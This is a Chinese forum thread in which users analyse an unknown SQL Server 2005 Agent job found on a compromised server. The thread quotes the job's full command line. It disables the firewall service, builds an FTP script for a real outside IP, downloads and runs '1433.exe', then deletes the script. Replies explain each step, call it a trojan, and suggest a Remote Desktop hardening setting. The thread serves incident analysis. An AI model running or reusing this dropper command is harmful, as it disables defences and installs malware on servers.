一个sqlserver 2005 作业代码的分析

cmd /c "sc config SQLSERVERAGENT start= AUTO&net1 stop sharedaccess&echo open 120.35.5.173> cmd.txt&echo tt>> cmd.txt&echo tt>> cmd.txt&echo binary >> cmd.txt&echo get 1433.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1433.exe&1433.exe&del cmd.txt /q /f&exit"
一个朋友说他的服务器上多了一个作业,不是他建的,让帮忙看看。。没有分析出来,,好像是病毒啊。。谁碰到过。

解决方案 »

  1.   

     open 120.35.5.173> cmd.txt 这个IP 是哪里的?
      

  2.   

    说是在sqlserver的作业下看到的。没有一个属性,就这一个步骤。步骤内容就是已经贴出来的。
      

  3.   

    左右,右键后有属性,有start,等,属性里有步骤。 
      

  4.   

    配置服务,开机启动sqlserver 代理服务,关闭SharedAccess(Intemet连接共享和防火墙服务)。
    后面的看不懂
      

  5.   

    是病毒,我的服务器也中了。
    配置SQLSERVERAGENT为自动开启,关闭Intemet连接共享和防火墙服务,打开 120.35.5.173,...,下载1433.exe(FTP服务器下载的木马程序),进入ftp环境后执行cmd.txt,执行1433.exe,删除cmd.txt,退出。
      

  6.   

    建议:在“管理工具”的“终端服务配置”里点击“连接”,然后右击RDP-Tcp,选择属性,点击“环境”标签,初始程序中选择《不允许启用初始程序。总是显示桌面。》
    详细资料见:
    http://hi.baidu.com/sdghgk/blog/item/9833a3164e2ccf11972b4303.html